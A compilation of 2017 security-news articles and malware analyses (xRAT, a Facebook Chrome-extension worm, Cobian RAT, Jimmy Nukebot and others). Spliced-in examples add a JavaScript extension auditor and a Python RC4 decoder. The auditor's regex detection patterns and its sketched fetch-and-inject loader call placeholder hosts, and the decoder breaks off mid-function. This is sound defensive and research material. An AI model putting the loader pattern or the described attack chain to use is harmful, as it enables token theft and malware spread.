Search external storage for a file with a specific MD5 hash and, if identified, retrieve it
Upload attacker specified files to C2 infrastructure
Make a call out to an attacker specified number
Record audio and write it directly to an already established command and control network socket
Execute an attacker specified command as the root user
Download a 22MB trojanized version of QQ from hiapk[.]com, saving it to /sdcard/.wx/wx.apk. Referred to as ‘rapid flow mode’.
To avoid detection, xRAT implements a “suicide” function that can be triggered to clean its installation from the infected mobile device. The malicious code also checks for specific antivirus applications and alerts its operators if any of them are present:

管家 (housekeeper)
安全 (safety)
权限 (Authority)
卫士 (Guardian)
清理 (Cleanup)
杀毒 (Antivirus)
xRAT can be remotely instructed to perform a wide range of deletion operations, such as removing large portions of a device or attacker-specified files like images from certain directories on the SDCard, all apps and data from /data/data/, and all system apps from /system/app/.

Most of the C&C infrastructure used by xRAT in the past was based in China, but the samples recently analyzed by the company communicated with servers located in the United States.

As anticipated, the C&C infrastructure also controlled a Windows malware. The experts also noticed a malicious executable named MyExam, which suggests that “the actors behind this family may be continuing to target students, similar to how attackers used mRAT during the protests in 2014.”

“The majority of command and control servers used by xRAT in the past have been based in China with some appearing in Hong Kong. After analyzing recently acquired samples, we further identified attacker infrastructure on the East Coast of the United States. This may indicate an expansion in deployment from the actor behind this family as they’ve previously used servers geographically close to regions where their tooling is being deployed.” continues the analysis.

xRAT Mobile Malware Emerges

5.9.2017 securityweek Virus
A recently discovered mobile remote access Trojan includes extensive data collection capabilities and is associated with known mobile and Windows-targeting threats, Lookout security researchers warn.

Dubbed xRAT, the malware appears to have evolved from the high-profile Xsser / mRAT malware that made headlines in late 2014. The newly discovered mobile threat features code structure almost identical to that of the mRAT family of malware, uses the same decryption key and certain heuristics and naming conventions that suggest the same actor has developed both of them.

Furthermore, the command and control (C&C) servers for the new mobile threat are also linked to Windows malware, suggesting that an experienced crime group is operating it. Earlier this year, security researchers discovered a free and open source remote access tool (RAT) named QuasarRAT that has evolved from the xRAT Windows malware.

The xRAT mobile Trojan, the security researchers say, appears to specifically target political groups and includes capabilities ranging from reconnaissance and information gathering, to detection evasion, antivirus checks, and app and file deletion functionality. The malware also gathers data from communications apps like QQ and WeChat and allows its operators to remotely control much of its functionality in real time.

On Android devices, the malware can exfiltrate browser history, device metadata, text messages, contacts, call logs, QQ and WeChat data, Wi-Fi access point information, email database and username / passwords, geolocation, list of installed apps, and SIM card information.

It can also provide the remote attacker with a shell, download or delete attacker specified files, enable airplane mode, list all files and directories on external storage or the contents of specified directories, retrieve files of an attacker specified type, search external storage, upload files to the C&C, make phone calls, record audio, execute commands as the root user, and download a trojanized version of QQ.

To avoid detection, xRAT includes a function to terminate itself and clean out its installation directory before uninstalling itself. The malware checks for specific antivirus applications, alerting the operators if they are present on a compromised device.

The threat also includes a robust file deletion module that can remove “large portions of a device or attacker-specified files,” including images from certain directories on the SDCard, audio files from certain directories on the SDCard, specific input method editors (IME), and messaging apps. It can also wipe a device by deleting all files from the SDCard, all apps and data from /data/data/, and all system apps from /system/app/.

Most of the C&C servers used by xRAT in the past were based in China, while recent samples revealed attacker infrastructure in the United States as well. The infrastructure has Windows malware associated with it, including a malicious executable named MyExam, which Lookout says is an indication that “the actors behind this family may be continuing to target students, similar to how attackers used mRAT during the protests in 2014.”

Dissecting the Chrome Extension Facebook malware
3.9.2017 Kaspersky
Social  Virus

It’s been a few days since Kaspersky Lab’s blog post about the Multi Platform Facebook malware that was spread through Facebook Messenger. At the same time as Kaspersky Lab was analyzing this threat, a few researchers were doing the same, including Frans Rosén, Security Advisor at Detectify.

After Frans saw David’s tweet about the blog post, he called David and asked why they were both doing the same job. Frans had a good point, so they started to compare notes and found out that Frans had actually analyzed some of the parts that David hadn’t. They decided to jointly write this second part of the analysis, which is going to describe the attack in detail.

Spreading mechanism

Frans spent quite some time analyzing the JavaScript and trying to figure out how the malware was spreading, which might seem like a simple task but it wasn’t. There were multiple steps involved trying to figure out what the Javascript payloads did. Also, since the script dynamically decided when to launch the attack, it had to be monitored when the attackers triggered it.

The conclusions can be broken down into a few steps, because it’s not only about spreading a link, the malware also notifies the attackers about each infection to collect statistics, and enumerates browsers. We tried summarizing the steps as simply as possible below:
The victim receives a link on Facebook Messenger from a friend.
The link goes to Google Docs with an image that looks like a fake video player with the friend’s profile picture.
Clicking on that link using Chrome will send you to a fake YouTube page that asks you to install a Chrome Extension directly on the page.
Installing that Chrome Extension will then spread malicious links to the victim’s online friends, combined with the victim’s profile picture.
There are some interesting things in all these steps, so we will take a closer look below.

Technical details

Facebook message

The message itself will consist of the first name of the user that gets the message, the word “Video” and one of these emojis selected at random:

together with a link created with a URL shortener.

Google Docs shared PDF preview

Clicking on the link will redirect the user to a URL on docs.google.com. This link is made by using the preview link of a shared PDF, most likely because it is the quickest way to get a large controlled content area on a legit Google domain with an external link.

The PDF itself is created using PHP with TCPDF 6.2.13 and then uploaded to Google Docs using Google Cloud Services. Clicking through will send us to a page containing details about the PDF file being previewed.

The share settings are an interesting detail about the link created:

“Anyone can edit”. This configuration means that anyone who has the link can actually edit it. Looking at how these links spread, the attack reuses the same link for all the victim’s friends. One friend changing the access rights of the link could potentially prevent the attack from spreading to the victim’s other friends.

Another interesting detail is the user who created the file. Collecting a bunch of examples, we can see some patterns:

These were four links created for different victims, but three of them share the same IAM username (ID-34234) even though they were created using different Google Cloud Projects.

At the time of the attack, none of the URLs being linked from the PDF preview were blacklisted by Google.

Redirect party

After the Google Docs link is clicked, the user will go through a bunch of redirects, most likely fingerprinting the browser. Below, we will focus on Chrome as it is clear it was one of the targeted browsers for the spreading mechanism.

For the other browsers, ads were shown and adware was downloaded, read more about this under Landing Pages below.

Fake YouTube page with Chrome Extension installation

When using Chrome, you are redirected to a fake YouTube page. We noticed several different domains being used during the attack.

This page will also ask you to install a Chrome Extension. Since you can install a Chrome Extension directly on the page, the only action the victim had to perform was to click “Add extension”. No other interaction after that point was needed from the victim for the attack to spread further.

Chrome Extension

Several different Chrome Extensions were used. All of the extensions were newly created and the code was stolen from legit extensions with similar names. The differences in the extensions’ Javascript code were the background.js and a modification in the manifest.json.

The manifest was changed to allow control over tabs and all URLs, and also to enable support for the background script:

The background script was obfuscated differently in all the Chrome Extensions we found, but the basic concept looked like this:

Obfuscated background script

This script was interesting in many ways.

First, the background script would fetch an external URL only if the extension was installed from the Chrome Webstore; a version installed locally using an unpacked extension would not trigger the attack.

The URL being fetched would contain a reference to another script. This script would be sent into a Javascript blob using URL.createObjectURL and then executed in the background script.

This new script from the blob would also be obfuscated. It looked like this:

What happens here is the following:
Add a listener to all tabs when the tab has loaded successfully.
When the tab is loaded, make a new request to another URL. If the response contains anything, it will send it to the tab that triggered it using executeScript. This will run the Javascript in the context of the tab making the request, basically injecting an XSS that will trigger directly.
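The manifest changes described above (control over tabs and all URLs plus a background script) and the fetch-to-blob-to-executeScript chain of the background script are the traits a defender can look for when reviewing an extension. The following static audit is an added example and is not code from the Kaspersky or Detectify analysis. It assumes Manifest v2 field names (what 2017-era extensions shipped) and uses two constructed samples: a benign manifest, and a modified one paired with a sketch of the background script that contains only the API names, not a working loader. Obfuscation, as seen in the real extensions, can hide these names, so the script indicators are a triage aid rather than a proof of absence.

```javascript
// Added example (not from the original write-up): static audit of a Chrome
// extension's manifest.json and background script for the traits described
// in the analysis. Manifest v2 field names are assumed.

// Host patterns that let an extension read and script every site the user visits.
const BROAD_HOST_PATTERNS = ['<all_urls>', '*://*/*', 'http://*/*', 'https://*/*'];

// Flag the manifest traits the analysis describes: "tabs", all-URL host
// permissions, and a background script.
function auditManifest(manifest) {
  const findings = [];
  const perms = manifest.permissions || [];
  if (perms.includes('tabs')) {
    findings.push('manifest: "tabs" permission lets the extension observe and target every open tab');
  }
  const broad = perms.filter((p) => BROAD_HOST_PATTERNS.includes(p));
  if (broad.length > 0) {
    findings.push(`manifest: host permission ${broad.join(', ')} allows script injection into any site`);
  }
  const bg = manifest.background || {};
  if ((Array.isArray(bg.scripts) && bg.scripts.length > 0) || bg.page) {
    findings.push('manifest: background script runs with no visible page and outlives tab closes');
  }
  return findings;
}

// Indicators taken from the analysis of the background script. Checking
// update_url is an assumed way of implementing the "installed from the
// Webstore" test; the write-up does not say how the real script did it.
const SCRIPT_INDICATORS = [
  { key: 'store-check', re: /update_url/, text: 'checks update_url (assumed store-install test) before acting' },
  { key: 'remote-fetch', re: /\bfetch\s*\(|XMLHttpRequest/, text: 'fetches remote content at runtime' },
  { key: 'blob-exec', re: /URL\.createObjectURL\s*\(\s*new\s+Blob/, text: 'stages fetched text into a Blob URL for execution' },
  { key: 'tab-listener', re: /chrome\.tabs\.onUpdated/, text: 'listens for every tab load' },
  { key: 'tab-inject', re: /chrome\.tabs\.executeScript/, text: 'injects script into tabs' },
];

// Combine manifest and script findings. The verdict 'remote-code-loader' is
// reserved for the full chain: remote fetch, blob staging, and tab injection.
function auditExtension({ manifest, background }) {
  const matched = SCRIPT_INDICATORS.filter((ind) => ind.re.test(background || ''));
  const keys = new Set(matched.map((ind) => ind.key));
  const findings = auditManifest(manifest).concat(matched.map((ind) => `script: ${ind.text}`));
  let verdict = findings.length === 0 ? 'clean' : 'review';
  if (['remote-fetch', 'blob-exec', 'tab-inject'].every((k) => keys.has(k))) {
    verdict = 'remote-code-loader';
  }
  return { findings, verdict };
}

// Constructed sample: the legitimate extension the attackers copied from.
const BENIGN_SAMPLE = {
  manifest: { manifest_version: 2, name: 'Notes', version: '1.0', permissions: ['storage'] },
  background: '',
};

// Constructed sample: the same extension after the described modifications.
// The background text is a sketch with placeholder names (STAGE_URL, C2_URL,
// run, inject), not runnable code.
const MODIFIED_SAMPLE = {
  manifest: {
    manifest_version: 2,
    name: 'Notes',
    version: '1.0.1',
    permissions: ['storage', 'tabs', '<all_urls>'],
    background: { scripts: ['background.js'], persistent: true },
  },
  background: [
    'if (chrome.runtime.getManifest().update_url) {',
    '  fetch(STAGE_URL).then(r => r.text()).then(code => {',
    '    run(URL.createObjectURL(new Blob([code]))); // second stage executed from the blob',
    '  });',
    '}',
    'chrome.tabs.onUpdated.addListener((tabId, info) => {',
    "  if (info.status === 'complete') fetch(C2_URL).then(r => r.text())",
    '    .then(js => inject(tabId, js)); // inject() wraps chrome.tabs.executeScript',
    '});',
  ].join('\n'),
};

for (const [name, ext] of Object.entries({ benign: BENIGN_SAMPLE, modified: MODIFIED_SAMPLE })) {
  console.log(name, JSON.stringify(auditExtension(ext), null, 2));
}
```

Run with Node; the benign sample yields no findings, while the modified one trips all three manifest checks and all five script indicators and is classed as a remote code loader. Since each indicator is a plain regex, a reviewer can extend the list with names specific to the extensions under review without changing the scoring logic.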
Getting all the scripts

When doing the research trying to identify the file that was being injected, I noticed that the attackers’ command and control server did not always return any code. My guess is that they were able to control when the attack should spread, either manually or by specifying when the attack should start.

To avoid sitting and waiting for a request to hit, I built my own pseudo extension doing the same thing as they did, but instead of triggering the code, I saved it locally.

Browsing around for a while, I noticed I got a bunch of hits. Their endpoint was suddenly returning back code:

The code returned was not obfuscated in any way, and had a simple flow of what it should do. It was fully targeted towards Facebook.

The script did the following:

Check that the domain it ran on contained facebook.com
Extract the CSRF token for requests on Facebook, called fb_dtsg. Check if it had already fetched the access token (being used to make authenticated calls to the Facebook API). If not, it would make a request which is commonly made on Android to get the access token using the CSRF token.
Send the access token + profile ID to an external site owned by the attackers.

Make sure that the platform functionality is enabled (disabling the platform kill-switch):
Create a legacy access token. It turns out that Facebook has deprecated their FQL API, which is an old way of talking with the Facebook API:

But the attackers found out that if you made an access token using the app called “Pages Manager for iOS”, the FQL API would still be enabled.
Now, let’s move on to the most interesting parts of what the script did.

Analytics for the attackers, liking a Facebook page

The script would like a page on Facebook that was hardcoded in the script. This was most likely used by the attackers to count the amount of infected users by keeping an eye on the amount of likes on this page.

Watching the page used during one phase of the attack, the amount increased fast, from 8,900 at one point:

and up to 32,000 just a few hours later:

It was also clear that they had control over when it should trigger or not using the script fetcher from the Command and Control, since the amount of likes increased at extremely varying speeds during the attack.

They also changed pages during the attack, most likely because they were closed down by Facebook.

Fetching your friends

Since the attackers now had an FQL-enabled access token, they could use the deprecated API to fetch the victim’s friends sorted by date of their online presence, getting the friends that were online at the time.

They randomized these friends picking 50 of them each time the attack would run only if the friends were marked as idle or online.

A link was then generated by a third domain, which only received the profile ID of the user. This site most likely created the PDF on Google Docs with the profile picture of the current victim and passed the public link back through a URL shortener.

After the link was fetched, a message was created randomly for each friend, but the link was reused among them.

Interesting details

Some parts of the injected code were never used, or were leftovers from previous attacks.

One part was the localization function to send messages in the proper locale of each friend. This was replaced by the random emoji in the live attack:


The domains used still had some easy-to-guess PHP files on the server, such as login.php. That one exposed a login script to Facebook together with a hardcoded email address:


We noticed multiple versions of the injected Facebook script being used. At the end of the attack, the script only liked the Facebook page and did not spread at all. Also, the domain being used to gather access tokens was removed from the script.

Landing pages

As already mentioned, the script also enumerates which browser you are using. The Chrome extension part is only valid for victims using Google Chrome. If you are using a different browser, the code will execute other commands.

What makes this interesting is that they have added support for most of the operating systems; we were not able to collect any samples targeting the Linux operating system.

All of the samples that we collected were identified as Adware, and before the victim landed on the final landing page, they were redirected through several tracking domains displaying spam/ads. This is an indication that the people behind this scam were trying to earn money from clicks and from distributing spam and ads.


MD5 (AdobeFlashPlayerInstaller.dmg) = d8bf71b7b524077d2469d9a2524d6d79
MD5 (FlashPlayer.dmg) = cfc58f532b16395e873840b03f173733
MD5 (MPlay.dmg) = 05163f148a01eb28f252de9ce1bd6978
These are all fake Adobe Flash updates, but the victim ends up at different websites every time; it seems that they are rotating a set of domains for this.

Mozilla Firefox

MD5 (VideoPlayerSetup_2368681540.exe) = 93df484b00f1a81aeb9ccfdcf2dce481
MD5 (VideoPlayerSetup_3106177604.exe) = de4f41ede202f85c370476b731fb36eb

“I was infected by this, what do I do?”

The Google Chrome Security Team has disabled all the malicious extensions, but when the attackers infected your Facebook profile they also stole an access-token from your Facebook account.

With this access-token the attackers will be able to gain access to your profile again, even if you have for example: Changed your password, signed out from Facebook or turned off the platform settings in Facebook:

We are currently discussing this with Facebook but at the moment it seems like there is no simple way for a victim to revoke the token the attackers stole.

It’s highly recommended that you update your Anti Virus solution because the malicious domains and scripts have been blocked.


The attack relied heavily on realistic social interactions, dynamic user content and legit domains as middle steps. The core infection point of the spreading mechanism above was the installation of a Chrome Extension. Be careful when you allow extensions to control your browser interactions and also make sure you know exactly what extensions you are running in your browser. In Chrome, you can write chrome://extensions/ in your URL field to get a list of your enabled extensions.

We would like to give out special thanks to the following people who helped us shut down the attack as much as possible:

Marc at CloudFlare
Trevor Pottinger at Facebook
April Eubank at Facebook
Rodrigo Paim at Facebook
Adam Rudderman and Jack Whitton of the Facebook Security team
Nav Jagpal at Google
Without your help this campaign would have been much more widespread. Thank you for your time and support! Also thanks to @edoverflow for poking at the obfuscated code at the same time as us.

Experts spotted a malware campaign using HoeflerText Popups to push RAT Malware
2.9.2017 securityaffairs

Experts spotted a new EITest campaign leveraging HoeflerText Popups to target Google Chrome users and push NetSupport Manager RAT or Locky ransomware
Security expert Brad Duncan, with both the SANS Internet Storm Center and Palo Alto Networks’ Unit 42, has spotted a malware campaign leveraging bogus popups that alert users to a missing web font.

The crooks are targeting Google Chrome and Firefox browser users. The researcher discovered that the popups deliver a malicious JavaScript file that in turn installs either the NetSupport Manager remote access tool (RAT) or Locky ransomware.

Duncan reported many similarities with the EITest malware campaign.

“The attackers behind the EITest campaign have occasionally implemented a social engineering scheme using fake HoeflerText popups to distribute malware targeting users of Google’s Chrome browser. In recent months, the malware used in the EITest campaign has been ransomware such as Spora and Mole.” reads the post published by PaloAlto Networks. “However, by late August 2017, this campaign began pushing a different type of malware. Recent samples are shown to infect Windows hosts with the NetSupport Manager remote access tool (RAT). This is significant, because it indicates a potential shift in the motives of this adversary.”

Victims are lured to a compromised website that generates a bogus popup message informing the user that the webpage they are trying to view cannot display correctly because their browser doesn’t have the correct “HoeflerText” font, and suggesting they fix the issue by downloading a Chrome Font Pack.


“However, when I tried these same links in Google Chrome, they displayed a fake notification stating: The “HoeflerText” font was not found.” Duncan wrote.

“These notifications also had an ‘update’ button. When I clicked it, I received a JavaScript file named Win.JSFontlib09.js. That JavaScript file is designed to download and install Locky ransomware.”

In another case, the same Chrome HoeflerText font update delivers a file named “Font_Chrome.exe” that downloads and installs the NetSupport Manager RAT.

Duncan also observed malicious spam messages including links to fake Dropbox pages that, when visited, showed a bogus notification about the need to install the HoeflerText font.

“If you viewed the pages in Chrome or Firefox, they showed a fake notification stating you don’t have the HoeflerText font. These fake notifications had an “update” button that returned a malicious JavaScript (.js) file.” said Duncan.

The expert tried different browsers and observed mixed behaviors: the Tor and Yandex browsers both returned the same results as IE 11 and Microsoft Edge when viewing those fake Dropbox pages, while Opera and Vivaldi returned the same HoeflerText notifications seen in Google Chrome.

“In recent days, I’ve noticed multiple waves of malspam every weekday. It gets a bit boring after a while, but as 2017-08-31 came to a close, I noticed a different technique from this malspam,” Duncan added.

Victims using Internet Explorer or Microsoft Edge on the bogus webpages did not see the HoeflerText popup; instead, they were shown a fake anti-virus alert with a phone number for a tech support scam.

“Users should be aware of this ongoing threat. Be suspicious of popup messages in Google Chrome that state: The ‘HoeflerText’ font wasn’t found. Since this is a RAT, infected users will probably not notice any change in their day-to-day computer use. If the NetSupport Manager RAT is found on your Windows host, it is probably related to a malware infection,” Duncan concluded.

China-linked KHRAT Operators Adopt New Delivery Techniques

1.9.2017 securityweek Virus
A recently observed KHRAT remote access Trojan (RAT) infection campaign uses updated spear phishing, download and execution techniques, Palo Alto Networks security researchers warn.

KHRAT is a backdoor associated with the China-linked cyber espionage group known as DragonOK, which has been previously known to use malware such as NetTraveler (aka TravNet), PlugX, Saker, Netbot, DarkStRat, and ZeroT in attacks against organizations in Russia and other surrounding countries. The recent campaign featuring the RAT targets victims located in Cambodia.

The malware was designed to register victims using their machine’s username, system language and local IP address, while also providing attackers with the typical set of RAT features, including remote access to the victim system, keylogging, screenshot taking capabilities, remote shell access, and the like.

After comparing the new attacks with previous KHRAT campaigns, Palo Alto concluded that the malware’s authors have updated their spear phishing techniques and themes and are using multiple methods to download and execute additional payloads using built-in Windows applications. They also expanded their infrastructure mimicking Dropbox, a well-known cloud-based file hosting service.

Although not very prevalent, the RAT has registered an uptick in usage over the past couple of months, the researchers say. The attacks against Cambodian targets were discovered in June, when Palo Alto researchers stumbled upon a malicious Word document designed to contact a server supposedly belonging to Dropbox.

In addition to hiding its network traffic, the document also included the acronym MIWRMP, which refers to the Mekong Integrated Water Resources Management Project, a multi-million dollar project regarding water resources and fisheries management in North Eastern Cambodia, thus seeming legitimate.

The document prompts the user to enable macros, which allows embedded VBA code to run and perform malicious operations, including creating new scheduled tasks and calling functions to run JavaScript code.

The researchers also connected the document to the domain name update.upload-dropbox[.]com, which has been hosted on a compromised Cambodian government website. The sample fetched from the compromised government servers would launch the legitimate regsvr32.exe program, in an attempt to bypass built-in Windows protections.

Another component related to the campaign would download an .ico file meant to create three scheduled tasks and use regsvr32.exe to download and execute three other .ico files. A DLL component was also associated with the campaign, but wasn’t downloaded and executed, the researchers say.

While investigating the KHRAT dropper code, the security researchers also stumbled upon JavaScript code that allows the actor to monitor who is visiting their site. The code would gather data such as user-agent, domain, cookie, referrer and Flash version, and appears almost identical to that found on a blog hosted on the Chinese Software Developer Network (CSDN) website.

“This most recent campaign highlights social engineering techniques being used with reference and great detail given to nationwide activities, likely to be forefront of peoples’ minds; as well as the new use of multiple techniques in Windows to download and execute malicious payloads using built-in applications to remain inconspicuous which is a change since earlier variants,” Palo Alto notes.

The researchers conclude that the threat actors behind KHRAT have updated both the malware and their tactics, techniques and procedures (TTPs) over the course of 2017. These changes are meant to help the actor produce more successful attacks.

“Other notable actions by the threat actors included updated infrastructure purporting to be part of either the well-known cloud-based company, Dropbox, or a travel agency, likely to appear genuine, masquerading traffic under the premise of other applications to communicate with the attack infrastructure, some of which included compromised Cambodian Government servers,” the researchers conclude.

Backdoored RAT Builder Kit Offered for Free

1.9.2017 securityweek Virus
The builder kit of a remote access Trojan (RAT) that was initially spotted in early 2017 contains a backdoored module, Zscaler reports.

Dubbed Cobian and monitored since February this year, the RAT shows similarities to the njRAT/H-Worm family of threats, which has been around since 2013. Both the Cobian RAT control panel and features are similar to those of njRAT and H-Worm, the security researchers say.

Cobian RAT’s builder was seen advertised on multiple underground forums, where it was being offered for free. Apparently, the reason for this was simple: the builder kit includes a backdoor module designed to retrieve command and control (C&C) information from a predetermined URL controlled by the original author.

Because of this setup, the malware developer gains control of the infected systems while relying on second-level operators to build and spread the RAT. The backdoor module gives the original malware author full control over the systems infected with Cobian RAT and also allows the author to modify the C&C server information configured by the second-level operators.

During analysis, Zscaler also noticed that Cobian includes a series of detection evasion mechanisms. The backdoor module is not activated if the machine name and username of the infected system are the same, and no traffic will be generated from the bot client to the backdoor C&C server in this case.

During a recent campaign, the malware was seen dropped via a ZIP archive masquerading as a Microsoft Excel spreadsheet. The executable payload was signed with an invalid certificate pretending to be from VideoLAN and was packed using a .NET packer, featuring the encrypted Cobian RAT payload embedded in the resource section. The dropper also included anti-debugging checks.

Once installed on the compromised system, the bot attempts to create a mutex to ensure only one instance of itself is running. It also creates a copy of itself as %TEMP%/svchost.exe, executes it and then terminates itself. To ensure persistence, the executed copy creates an autostart registry key.

The RAT’s main features are present in njRAT as well, including keylogging, screen capture, webcam capture, voice recording, file browsing, a remote command shell, support for dynamic plugins, and the ability to install/uninstall programs.

It can also terminate or restart the bot process, update the C&C list, work as a stress tester (flood attacks using UDP or TCP traffic), run executables or scripts from the local disk or a remote URL, and steal passwords.

The bot spawns two threads in the background: one is responsible for persistence and for taking screenshots, while the other performs a regular check-in with the remote C&C server. The malware stores the C&C server address in the configuration function as a base64-encoded string.

“Cobian RAT appears to be yet another RAT that is spawned from the leaked njRAT code. It is ironic to see that the second level operators, who are using this kit to spread malware and steal from the end user, are getting duped themselves by the original author. The original author is essentially using a crowdsourced model for building a mega botnet that leverages the second level operators botnet,” Zscaler concludes.

Vxer is offering Cobian RAT in the underground, but it is backdoored
1.9.2017 securityaffairs

A malware writer is offering a RAT dubbed Cobian for free in the underground, but the malicious code hides an ugly surprise.
In the dark web, it is quite easy to find lone vxers and hacking forums that offer malware and customize it according to buyers’ needs.

Recently, researchers from Zscaler spotted a remote access trojan dubbed Cobian RAT that was offered for free in the underground. It is a fairly basic piece of malicious code based on an old RAT known as njRAT; it implements common spying features such as a keylogger, webcam hijacking and screen capturing, and of course the ability to execute the attackers’ code on the victim’s system.

“The Zscaler ThreatLabZ research team has been monitoring a new remote access Trojan (RAT) family called Cobian RAT since February 2017. The RAT builder for this family was first advertised on multiple underground forums where cybercriminals often buy and sell exploit and malware kits,” reads the analysis from Zscaler. “This RAT builder caught our attention as it was being offered for free and had a lot of similarities to the njRAT/H-Worm family, which we analyzed in this report.”

Unfortunately, the Cobian RAT hides a malicious feature in an encrypted library: the code allows the author of the malware to take full control of machines infected with the RAT.

Cobian RAT builder

The code could also be used by the author to completely cut off the crooks who initially infected the machine with the Cobian RAT.

The malware researchers noticed that the backdoor module hidden in the Cobian builder kit communicates with a preset page on Pastebin that was managed by the original author. In this way, the malware gets the current address of the command and control servers run by the original writer, but it first checks for the presence of the second level operator online to avoid being detected.

The experts speculate that the original author’s purpose is to build a massive botnet by exploiting the effort of second-level operators in spreading the Cobian RAT.

“It is ironic to see that the second level operators, who are using this kit to spread malware and steal from the end user, are getting duped themselves by the original author. The original author is essentially using a crowdsourced model for building a mega Botnet that leverages the second level operators’ Botnet,” Zscaler concluded.

Gazer: A New Backdoor Targets Ministries and Embassies Worldwide
30.8.2017 thehackernews 

Security researchers at ESET have discovered a new malware campaign targeting consulates, ministries and embassies worldwide to spy on governments and diplomats.
Active since 2016, the malware campaign is leveraging a new backdoor, dubbed Gazer, and is believed to be carried out by the Turla advanced persistent threat (APT) hacking group, which has previously been linked to Russian intelligence.
Written in C++, the Gazer backdoor is delivered via spear-phishing emails and hijacks targeted computers in two steps: first, the malware drops the Skipper backdoor, which has previously been linked to Turla, and then it installs the Gazer components.
In previous cyber espionage campaigns, the Turla hacking group used the Carbon and Kazuar backdoors as its second-stage malware, which also have many similarities with Gazer, according to research [PDF] published by ESET.
Gazer receives encrypted commands from a remote command-and-control server and evades detection by using compromised, legitimate websites (that mostly use the WordPress CMS) as a proxy.

Instead of using the Windows Crypto API, Gazer uses custom 3DES and RSA encryption libraries to encrypt the data before sending it to the C&C server, a common tactic employed by the Turla APT group.
Gazer uses a code-injection technique to take control of a machine and hide itself for a long period of time in an attempt to steal information.
Gazer backdoor also has the ability to forward commands received by one infected endpoint to the other infected machines on the same network.
So far, ESET researchers have identified four different variants of the Gazer malware in the wild, primarily spying on Southeast European and former Soviet bloc political targets.
Interestingly, earlier versions of Gazer were signed with a valid certificate issued by Comodo for "Solid Loop Ltd," while the latest version is signed with an SSL certificate issued to "Ultimate Computer Support Ltd."
According to researchers, Gazer has already managed to infect a number of targets worldwide, with the most victims being located in Europe.

Jimmy Nukebot: from Neutrino with love
30.8.2017 Kaspersky
“You FOOL! This isn’t even my final form!”

In one of our previous articles, we analyzed the NeutrinoPOS banker as an example of a constantly evolving malware family. A week after publication, this Neutrino modification delivered up a new malicious program classified by Kaspersky Lab as Trojan-Banker.Win32.Jimmy.

NeutrinoPOS vs Jimmy

The authors seriously rewrote the Trojan – the main body was restructured, the functions were moved to the modules. One small difference that immediately stands out is in the calculation of checksums from the names of API functions/libraries and strings. In the first case, the checksums are used to find the necessary API calls; in the second case, for a comparison of strings (commands, process names). This approach makes static analysis much more complicated: for example, to identify which detected process halts the Trojan operation, it’s necessary to calculate the checksums from a huge list of strings, or to bruteforce the symbols in a certain length range. NeutrinoPOS uses two different algorithms to calculate checksums for the names of API calls, libraries and for the strings. They look like this:

Restored NeutrinoPOS code to calculate checksums for arbitrary strings and for API calls
In Jimmy, only one algorithm is used for these purposes – a slight modification of CalcCS from NeutrinoPOS. The final XOR with the fixed two-byte value was added to the pseudo-random generator.

Calculation of checksums in Jimmy
The Trojan has completely lost the functionality for stealing bank card data from the memory of an infected device; now its task is limited solely to receiving modules from a remote node and installing them into the system. The scan of the infected host has been extended: in addition to the checks inherited from Neutrino, the Trojan also examines its own file name, which should not look like an MD5, SHA-1 or SHA-256 hash (the way automated analysis systems often name samples) or, alternatively, should contain the ‘.’ symbol, indicating a following extension (for example, ‘exe’). In addition, using the cpuid instruction, the Trojan gets information about the processor and compares it with the list of checksums embedded in it.

Additional Jimmy checks
The communication protocol with the C&C server also remains unchanged: the same exchange of base64-encoded “enter” and “success” commands is used, but now the reply is first encrypted with RC4 using a key hardcoded in the body of the Trojan (a8A5QfZk3r7FHy9o6C2WpBc44TiXg93Y for the sample in question). The code for extracting the encryption key was linked from the original post.

Analysis of modules

As mentioned above, the main body of the Trojan only receives modules – these contain the payload. We managed to get hold of new modules for web-injects, mining and a large number of updates for the main module in various droppers.

The miner is designed to mine the Monero cryptocurrency (XMR). The module code contains an identifier associated with the wallet that receives the mined currency, as well as the address of the pool. Monero is very popular with virus writers – it’s mined by SambaCry, which we described in June, and by Trojan.Win32.DiscordiaMiner, which appeared shortly afterwards. Incidentally, the source code of the latter was made publicly available by its author, for the same reason that prompted the author of NukeBot to do likewise: an attempt to settle disagreements on forums and avoid accusations of fraud (the repository with the code is currently unavailable).

Thanks to the identifier/pool pair, we got statistics on all the nodes working for this wallet. The start date of mining – 4 July – coincides with the compilation of the main body of the first discovered sample and is extremely close to the date of compilation of the dropper (06 July 13:14:55 2017 UTC), the main body (02 July 14:19:03 2017 UTC) and the modules for web injects (July 02, 14:18:39 2017 UTC). So it’s safe to say that Jimmy began to proliferate in early July.

It’s worth noting that the amount of money in the wallet is small – only ~ 0.55 XMR, which as of 21 August is only $45. Judging by the general decline and absence of payments, the authors quickly abandoned the use of miners or changed their wallet.

The web-inject modules are so called for their primary intended use, although they are also able to perform functions similar to those in NeutrinoPOS, i.e., take screenshots, “raise” proxy servers, etc. These modules are distributed in the form of libraries and their functions vary depending on the name of the process in which they are located. As you can see from the screenshot below, in three cases out of five the ChromeHook procedure is called for browsers. This is not surprising, considering the large number of Chrome-based browsers. Unfortunately, it was possible to restore the name from the checksum for only one of them – chrome.exe (0xFC0C7619). Checksums are calculated using the algorithm described in the previous section.

Restored code of the main procedure in the module of Jimmy web injects
Like NeutrinoPOS, Jimmy stores a number of parameters in the registry. In the sample in question, the data is in the HKEY_CURRENT_USER\Software\c2Fsb21vbkBleHBsb2l0Lmlt branch. For example, this is where the web-inject module reads the address of the DNS server currently in use – this is critical when Namecoin-like addresses are used for the C&C server.

For Firefox and Internet Explorer, the function hook is performed by straightforward substitution of the called function addresses in the loaded libraries (e.g. InternetConnectW / PR_Read). With Chrome, things are a bit more complicated – the necessary libraries are linked statically. The subsequent substitution of page data by the web injects is the same, however.

Restored web-inject processing code
So far we have only managed to get a test sample of the web injects (in the screenshot below); in the future the Trojan will most likely acquire ‘combat’ versions. Examples of web injects and the keys used were linked from the original post. To recap, decryption entails decoding the string using base64 and then decrypting it with RC4.
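The base64-over-RC4 layering described for the C&C replies above and for the web-inject configuration here is the same decoding step an analyst repeats on captured traffic. As an added example (not code from the Kaspersky write-up), the following Python reconstructs that layer with the key quoted for the analysed sample; the message contents and the parse helper are constructed for illustration, and the `rc4_*` routines are a standard RC4, not the Trojan’s own code.

```python
import base64

# Key quoted in the write-up for the analysed Jimmy sample.
C2_KEY = b"a8A5QfZk3r7FHy9o6C2WpBc44TiXg93Y"

# The two plaintext commands the write-up names for the C&C exchange.
KNOWN_COMMANDS = {"enter", "success"}


def rc4_ksa(key: bytes) -> list:
    """RC4 key scheduling: build the 256-byte state permutation from the key."""
    if not key:
        raise ValueError("RC4 key must not be empty")
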